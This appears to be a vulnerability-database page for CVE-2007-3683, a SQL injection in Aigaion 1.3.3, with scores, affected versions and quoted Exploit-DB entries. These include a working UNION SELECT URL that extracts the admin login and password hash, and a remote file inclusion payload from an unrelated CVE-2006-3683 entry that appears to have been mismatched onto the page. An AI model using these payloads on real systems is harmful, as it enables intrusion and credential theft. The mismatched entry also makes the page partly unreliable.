CVE-2007-3683
published 2007-07-11CVE-2007-3683: SQL injection vulnerability in pagetopic.php in Aigaion 1.3.3 and earlier allows remote attackers to execute arbitrary SQL commands via the topic_id parameter.
PriorityP342high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.20%
64.4th percentile
SQL injection vulnerability in pagetopic.php in Aigaion 1.3.3 and earlier allows remote attackers to execute arbitrary SQL commands via the topic_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| aigaion | aigaion | <= 1.3.3 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Aigaion 1.3.3 - 'topic topic_id' SQL Injection
exploitdb·2007-07-09
CVE-2007-3683 Aigaion 1.3.3 - 'topic topic_id' SQL Injection
Aigaion 1.3.3 - 'topic topic_id' SQL Injection
---
--==+================================================================================+==--
--==+ Aigaion <= 1.3.3 SQL Injection Exploit +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net
Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--
EXPLOITS:
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&to
Exploit-DB
Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion
exploitdb·2007-02-02
CVE-2006-3683 Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion
Flipper Poll 1.1.0 - 'poll.php?root_path' Remote File Inclusion
---
Flipper Poll v1.1.0 (poll.php) remote file include vuln
Found: Cyber-Security
cyber-security.org
Script Download: http://sourceforge.net/project/showfiles.php?group_id=59828
Vuln Code: include_once($root_path . 'config.php');
Exploit: /poll.php?root_path=evilscripts?
Reference: http://www.cyber-security.org/DataDetayAll.Asp?Data_id=596
# milw0rm.com [2007-02-02]
http://osvdb.org/35964http://secunia.com/advisories/25996http://www.securityfocus.com/bid/24836http://www.vupen.com/english/advisories/2007/2474https://exchange.xforce.ibmcloud.com/vulnerabilities/35306https://www.exploit-db.com/exploits/4164http://osvdb.org/35964http://secunia.com/advisories/25996http://www.securityfocus.com/bid/24836http://www.vupen.com/english/advisories/2007/2474https://exchange.xforce.ibmcloud.com/vulnerabilities/35306https://www.exploit-db.com/exploits/4164
2007-07-11
Published